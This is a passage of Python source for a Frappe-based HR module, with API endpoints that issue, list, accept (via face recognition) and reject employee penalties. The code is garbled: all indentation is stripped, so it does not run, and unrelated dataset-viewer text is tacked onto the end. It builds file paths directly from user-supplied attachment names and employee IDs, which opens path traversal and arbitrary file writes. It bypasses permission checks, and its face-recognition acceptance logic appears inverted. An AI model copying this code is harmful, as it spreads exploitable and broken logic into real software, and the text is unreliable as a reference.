penalty_issuance.asset_damage = cint(asset_damage)
employees = json.loads(penalty_employees)
for employee in employees:
penalty_issuance.append('employees', employee)
penalty_issuance_details = json.loads(penalty_details)
for detail in penalty_issuance_details:
if detail["attachments"] and detail["attachment_name"]:
filename = detail["attachment_name"]
attach = detail["attachments"]
content = base64.b64decode(attach)
OUTPUT_IMAGE_PATH = frappe.utils.cstr(frappe.local.site)+"/public/files/Legal/"+filename
fh = open(OUTPUT_IMAGE_PATH, "wb")
fh.write(content)
fh.close()
Attachment_file="/files/Legal/"+filename
detail.update({'attachments': Attachment_file})
detail.pop("attachment_name")
penalty_issuance.append('penalty_issuance_details', detail)
if penalty_category == "Performace":
penalty_issuance.shift = shift
penalty_issuance.site = site
penalty_issuance.project = project
penalty_issuance.site_location = site_location
penalty_issuance.insert()
penalty_issuance.submit()
return response("Success", 201, penalty_issuance)
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_penalties(employee_id: str = None, role: str = None) -> dict:
if not employee_id:
return response("Bad Request", 400, None, "employee_id required.")
if not isinstance(employee_id, str):
return response("Bad Request", 400, None, "employee_id must be of type str.")
if role:
if not isinstance(role, str):
return response("Bad Request", 400, None ,"role must be of type str.")
try:
employee = frappe.db.get_value("Employee", {"employee_id": employee_id})
if not employee:
return response("Resource not found", 404, None, "No employee found with {employee_id}".format(employee_id=employee_id))
if role and role == "Issuance":
result = frappe.get_list("Penalty", filters={"issuer_employee": employee}, fields=["name", "penalty_issuance_time", "workflow_state"], order_by="modified desc")
if len(result) > 0:
return response("Success", 200, result)
else:
return response("Resource not found", 404, None, "No penalties found for {employee} with role as {role}".format(employee=employee, role=role))
else:
result = frappe.get_list("Penalty", filters={"recipient_employee": employee}, fields=["name", "penalty_issuance_time", "workflow_state"], order_by="modified desc")
if len(result) > 0:
return response("Success", 200, result)
else:
return response("Resource not found", 404, None, "No penalties found for {employee}".format(employee=employee))
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def get_penalty_details(penalty_name: str = None) -> dict:
"""This method gets the details of a specific penalty provided the name of the penalty document.
Args:
penalty_name (str): Name of the penalty document.
Returns:
dict: {
message (str): Brief message indicating the response,
status_code (int): Status code of response.
data (dict): Penalty deatils.
error (str): Any error handled.
}
"""
if not penalty_name:
return response("Bad Request", 400, None, "penalty_name required.")
if not isinstance(penalty_name, str):
return response("Bad Request", 400, None, "penalty_name must be of type str.")
try:
penalty_doc = frappe.get_doc("Penalty", {"name": penalty_name})
if not penalty_doc:
return response("Resource not found", 404, None, "No penalty of name {penalty_doc} found.".format(penalty_doc=penalty_doc))
return response("Success", 200, penalty_doc.as_dict())
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def accept_penalty(employee_id: str = None, file: str = None, docname: str = None) -> dict:
""" This is an API to accept penalty. To Accept Penalty, one needs to pass the face recognition test.
Image file in base64 format is passed through face regonition test. And, employee is given 3 tries.
If face recognition is true, the penalty gets accepted.
If Face recognition fails even after 3 tries, the image is sent to legal mangager for investigation.
Args:
file (str): Base64 url of captured image.
docname (str): Name of the penalty doctype
Returns:
dict: {
message (str): Brief message indicating the response,
status_code (int): Status code of response.
data (dict): penalty accepted document as dictionary,
error (str): Any error handled.
}
"""
if not file:
return response("Bad Request", 400, None, "base64 encoded file required.")
if not docname:
return response("Bad Request", 400, None, "docname required.")
if not isinstance(file, str):
return response("Bad Request", 400, None, "file must be base64 encoded type str.")
if not isinstance(docname, str):
return response("Bad Request", 400, None, "docname must be of type str.")
try:
OUTPUT_IMAGE_PATH = frappe.utils.cstr(frappe.local.site)+"/private/files/"+employee_id+".png"
penalty_doc = frappe.get_doc("Penalty", docname)
if not penalty_doc:
return response("Resource not found", 404, None, "No penalty of name {penalty_doc} found.".format(penalty_doc=penalty_doc))
penalty_doc.retries = cint(penalty_doc.retries) - 1
image = upload_image(file, OUTPUT_IMAGE_PATH)
if recognize_face(image):
if cint(penalty_doc.retries) == 0:
penalty_doc.verified = 0
send_email_to_legal(penalty_doc)
else:
penalty_doc.verified = 1
penalty_doc.workflow_state = "Penalty Accepted"
penalty_doc.save(ignore_permissions=True)
file_doc = frappe.get_doc({
"doctype": "File",
"file_url": "/private/files/"+employee_id+".png",
"file_name": employee_id+".png",
"attached_to_doctype": "Penalty",
"attached_to_name": docname,
"folder": "Home/Attachments",
"is_private": 1
})
file_doc.flags.ignore_permissions = True
file_doc.insert()
frappe.db.commit()
return response("Success", 201, penalty_doc.as_dict())
else:
return response("Unauthorized", 401, None, "Face not recognized.")
except Exception as error:
return response("Internal Server Error", 500, None, error)
@frappe.whitelist()
def reject_penalty(rejection_reason: str = None, docname: str = None):
""" This method rejects a penalty given a reason and penalty document name.
Args:
rejection_reason (str): Basis and/or reasoning due to which the employee is rejecting the issuance of penalty.
docname (str): Name of the penalty doctype.
Returns:
dict: {
message (str): Brief message indicating the response,
status_code (int): Status code of response.
data (dict): penalty rejected document as dictionary,
error (str): Any error handled.
}
"""
if not rejection_reason:
return response("Bad Request", 400, None, "rejection_reason required.")
if not docname:
return response("Bad Request", 400, None, "docname required.")
if not isinstance(rejection_reason, str):
return response("Bad Request", 400, None, "rejection_reason must be of type str.")
if not isinstance(docname, str):
return response("Bad Request", 400, None, "docname must be of type str.")
try:
penalty_doc = frappe.get_doc("Penalty", docname)
if not penalty_doc:
return response("Resource not found", 404, None, "No penalty of name {penalty_doc} found.".format(penalty_doc=penalty_doc))
if penalty_doc.workflow_state == 'Penalty Issued':
penalty_doc.reason_for_rejection = rejection_reason
penalty_doc.workflow_state = "Penalty Rejected"
penalty_doc.save(ignore_permissions=True)
frappe.db.commit()
return response("Success", 201, penalty_doc.as_dict())
else:
return response("Bad Request", 400, None, "Penalty has not yet reached workflow state of 'Penalty Issued'.")
except Exception as error:
return response("Internal Server Error", 500, None, error)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.